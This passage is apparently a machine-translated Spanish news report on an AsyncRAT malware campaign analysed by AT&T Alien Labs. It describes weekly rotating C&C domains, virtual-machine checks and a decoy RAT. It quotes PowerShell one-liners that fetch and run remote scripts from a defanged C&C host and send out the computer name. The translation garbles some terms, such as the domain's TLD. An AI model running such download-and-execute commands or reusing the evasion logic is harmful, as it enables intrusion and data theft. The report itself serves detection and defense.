La carga útil es otro script codificado escrito en PowerShell que se ejecuta directamente en la memoria sin guardarse en el disco con un “conhost –headless powershell iex(curl -useb sduyvzep[.]comando superior/1.php?hash=)”. El dominio del servidor C&C se rota periódicamente.
El script de PowerShell ejecuta otro script de PowerShell invocando el comando iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”) comando. Esto envía cierta información al servidor C&C, como el nombre de host de la computadora y una variable llamada $wiqnfex que indica la probabilidad de que la computadora sea una máquina virtual o una zona de pruebas. Este valor se establece después de que el primero realiza algunas comprobaciones del adaptador de la tarjeta gráfica y del BIOS del sistema, que se emularía en una máquina virtual.
Si el servidor C&C determina que $wiqnfex indica un objetivo válido, el servidor implementa AsyncRAT. Si el valor de la variable indica una posible VM o sandbox, redirige la solicitud a Google o a un script de PowerShell diferente que descarga y lanza una RAT señuelo.
«Cuando se descompila, el RAT es en realidad una distracción para cualquier investigador que investigue la campaña», dijeron los investigadores de Alien Lab. “La muestra es un señuelo hecho para parecerse a una RATA por varias razones. El nombre del ensamblado es DecoyClient y la configuración no está cifrada como lo estaría en una muestra de AsyncRAT. Además, el ejemplo no contiene un servidor C&C, solo direcciones de bucle invertido. Además, entre los datos que se filtrarán al C&C, se encuentra la cadena ‘LOL’ o el grupo ‘GOVNO’”.
Un nuevo dominio de comando y control cada semana
Además de aleatorizar periódicamente el código de script y las muestras de malware para evadir la detección, los atacantes también rotan los dominios C&C cada semana. Sin embargo, los investigadores de Alien Lab lograron aplicar ingeniería inversa al algoritmo de generación de dominios, que junto con varias otras constantes como el TLD (.top), el registrador y el nombre de la organización utilizados para registrar los dominios, pudieron encontrar los dominios utilizados. en el pasado y obtener muestras anteriores de los scripts de implementación.
«Se ha observado que estos dominios tienen las mismas características mencionadas anteriormente, con la diferencia de tener 15 caracteres», dijeron los investigadores. «Esto nos permite pivotar y encontrar muestras históricas basadas en DGA, así como crear detecciones para identificar infraestructura futura a pesar de todos sus esfuerzos por evadir EDR y detecciones estáticas». El informe de AT&T Alien Labs incluye firmas de detección para esta campaña que se pueden usar con el sistema de detección de intrusiones de código abierto Suricata, así como una lista de indicadores de compromiso (IOC) que se pueden usar para crear detecciones para otros sistemas.
